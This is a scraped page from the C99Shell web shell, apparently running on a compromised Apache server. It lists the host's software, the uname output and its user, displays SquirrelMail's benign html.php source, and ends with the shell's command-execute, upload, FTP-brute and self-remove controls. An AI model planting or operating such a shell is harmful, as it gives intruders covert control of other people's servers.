!C99Shell v. 1.0 pre-release build #13!

Software: Apache/2.0.54 (Unix) mod_perl/1.99_09 Perl/v5.8.0 mod_ssl/2.0.54 OpenSSL/0.9.7l DAV/2 FrontPage/5.0.2.2635 PHP/4.4.0 mod_gzip/2.0.26.1a 

uname -a: Linux snow.he.net 4.4.276-v2-mono-1 #1 SMP Wed Jul 21 11:21:17 PDT 2021 i686 

uid=99(nobody) gid=98(nobody) groups=98(nobody) 

Safe-mode: OFF (not secure)

/usr/local/webmail2/functions/   drwxr-xr-x
Free 318.38 GB of 458.09 GB (69.5%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     html.php (4.98 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * html.php
 *
 * The idea is to inlcude here some functions to make easier
 * the right to left implementation by "functionize" some
 * html outputs.
 *
 * @copyright &copy; 1999-2006 The SquirrelMail Project Team
 * @license http://opensource.org/licenses/gpl-license.php GNU Public License
 * @version $Id: html.php,v 1.27 2006/01/23 18:39:32 tokul Exp $
 * @package squirrelmail
 * @since 1.3.0
 */

/**
 * Generates html tags
 *
 * @param string $tag Tag to output
 * @param string $val Value between tags
 * @param string $align Alignment (left, center, etc)
 * @param string $bgcolor Back color in hexadecimal
 * @param string $xtra Extra options
 * @return string HTML ready for output
 * @since 1.3.0
 */
function html_tag$tag,                // Tag to output
                       
$val '',           // Value between tags
                       
$align '',         // Alignment
                       
$bgcolor '',       // Back color
                       
$xtra '' ) {       // Extra options

    
GLOBAL $languages$squirrelmail_language;

    
$align strtolower$align );
    
$bgc '';
    
$tag strtolower$tag );

    if ( isset( 
$languages[$squirrelmail_language]['DIR']) ) {
        
$dir $languages[$squirrelmail_language]['DIR'];
    } else {
        
$dir 'ltr';
    }

    if ( 
$dir == 'ltr' ) {
        
$rgt 'right';
        
$lft 'left';
    } else {
        
$rgt 'left';
        
$lft 'right';
    }

    if ( 
$bgcolor <> '' ) {
        
$bgc " bgcolor=\"$bgcolor\"";
    }

    switch ( 
$align ) {
    case 
'':
        
$alg '';
        break;
    case 
'right':
        
$alg " align=\"$rgt\"";
        break;
    case 
'left':
        
$alg " align=\"$lft\"";
        break;
    default:
        
$alg " align=\"$align\"";
        break;
    }

    
$ret "<$tag";

    if ( 
$dir <> 'ltr' ) {
        
$ret .= " dir=\"$dir\"";
    }
    
$ret .= $bgc $alg;

    if ( 
$xtra <> '' ) {
        
$ret .= " $xtra";
    }

    if ( 
$val <> '' ) {
        
$ret .= ">$val</$tag>\n";
    } else {
        
$ret .= '>'"\n";
    }

    return( 
$ret );
}

/**
 * handy function to set url vars
 *
 * especially useful when $url = $PHP_SELF
 * @param string $url url that must be modified
 * @param string $var variable name
 * @param string $val variable value
 * @param boolean $link controls sanitizing of ampersand in urls (since 1.3.2)
 * @return string $url modified url
 * @since 1.3.0
 */
function set_url_var($url$var$val=0$link=true) {
    
$k '';
    
$pat_a = array (
                    
'/.+(\\&'.$var.')=(.*)\\&/AU',   /* in the middle */
                    
'/.+\\?('.$var.')=(.*\\&).+/AU'/* at front, more follow */
                    
'/.+(\\?'.$var.')=(.*)$/AU',     /* at front and only var */
                    
'/.+(\\&'.$var.')=(.*)$/AU'      /* at the end */
                    
);
    
preg_replace('/&amp;/','&',$url);

    
// FIXME: why switch is used instead of if () or one preg_match()
    
switch (true) {
    case (
preg_match($pat_a[0],$url,$regs)):
        
$k $regs[1];
        
$v $regs[2];
        break;
    case (
preg_match($pat_a[1],$url,$regs)):
        
$k $regs[1];
        
$v $regs[2];
        break;
    case (
preg_match($pat_a[2],$url,$regs)):
        
$k $regs[1];
        
$v $regs[2];
        break;
    case (
preg_match($pat_a[3],$url,$regs)):
        
$k $regs[1];
        
$v $regs[2];
        break;
    default:
        if (
$val) {
            if (
strpos($url,'?')) {
                
$url .= "&$var=$val";
            } else {
                
$url .= "?$var=$val";
            }
        }
        break;
    }

    if (
$k) {
        if (
$val) {
            
$rpl "$k=$val";
            if (
$link) {
                
$rpl preg_replace('/&/','&amp;',$rpl);
            }
        } else {
            
$rpl '';
        }
        if( 
substr($v,-1)=='&' ) {
            
$rpl .= '&';
        }
        
$pat "/$k=$v/";
        
$url preg_replace($pat,$rpl,$url);
    }
    return 
$url;
}

/**
 * Temporary test function to process template vars with formatting.
 * I use it for viewing the message_header (view_header.php) with
 * a sort of template.
 * @param mixed $var
 * @param mixed $format_ar
 * @since 1.3.0
 * @todo if function is temporary, then why it is used.
 * @deprecated
 */
function echo_template_var($var$format_ar = array() ) {
    
$frm_last count($format_ar) -1;

    if (isset(
$format_ar[0])) echo $format_ar[0];
    
$i 1;

    switch (
true) {
    case (
is_string($var)):
        echo 
$var;
        break;
    case (
is_array($var)):
        
$frm_a array_slice($format_ar,1,$frm_last-1);
        foreach (
$var as $a_el) {
            if (
is_array($a_el)) {
                
echo_template_var($a_el,$frm_a);
            } else {
                echo 
$a_el;
                if (isset(
$format_ar[$i])) {
                    echo 
$format_ar[$i];
                }
                
$i++;
            }
        }
        break;
    default:
        break;
    }
    if (isset(
$format_ar[$frm_last]) && $frm_last>$i ) {
        echo 
$format_ar[$frm_last];
    }
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0047 ]--